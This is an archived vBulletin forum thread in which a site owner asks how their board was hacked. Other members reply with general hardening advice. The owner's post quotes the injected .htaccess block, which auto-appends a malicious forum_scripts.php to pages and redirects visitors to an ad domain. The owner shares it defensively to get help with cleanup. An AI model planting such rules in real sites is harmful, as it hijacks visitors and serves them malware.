vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)
-   -   URL htaccess Hacking (https://vborg.vbsupport.ru/showthread.php?t=303636)

tomtom1984 10-20-2013 05:25 PM
URL htaccess Hacking
 
Hi,

my page was hackt. Vbseo.com was no longer accessible at this time.
I have mapped the shorter the code here once. In the forum_scripts.php was referring to a google site with the js virus.
How could this happen? My Content relevant settings were not saved? How can I prevent it?



#########rataman##########
<FilesMatch ".(php|html|phtml|shtml)$">
php_value auto_append_file forum_scripts.php
</FilesMatch>
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://tastyads.biz/ts/wmid?Grand [L,R=302]
#########!rataman!#########


infected files:
updata.php
.htaccess
forum_scripts.php

--------------- Added [DATE]1382299320[/DATE] at [TIME]1382299320[/TIME] ---------------

xss ?

tbworld 10-21-2013 11:42 PM
I am guessing you have secured your board via the latest recommendations. If so, your next best bet is to examine your server logs and back-trace the operation. There is always evidence.

Please make sure you have read about the current exploits and their fixes at vbulletin.com (announcements).

If you were currently hacked, make sure you follow the recommendations.
https://vborg.vbsupport.ru/showthrea...26#post2448326

Sorry you were hacked.

TheLastSuperman 10-22-2013 12:10 AM
Also, make sure ANY AND ALL other software you are running is also kept up-to-date and secure. Rough example - if you are running an outdated version of let's say... hmm OpenX for ads/banners and it is outdated, then yes they can hack that and depending on how they hack it could potentially upload shell scripts or other and then subsequently hack into your forum.

The main thing to note here is: "I own so and so website, I must make sure I keep ALL software up to date, it is my responsibility to know these things and maintain secure software at all times" etc etc :cool:


All times are GMT. The time now is 11:49 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01033 seconds
  • Memory Usage 1,713KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (3)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete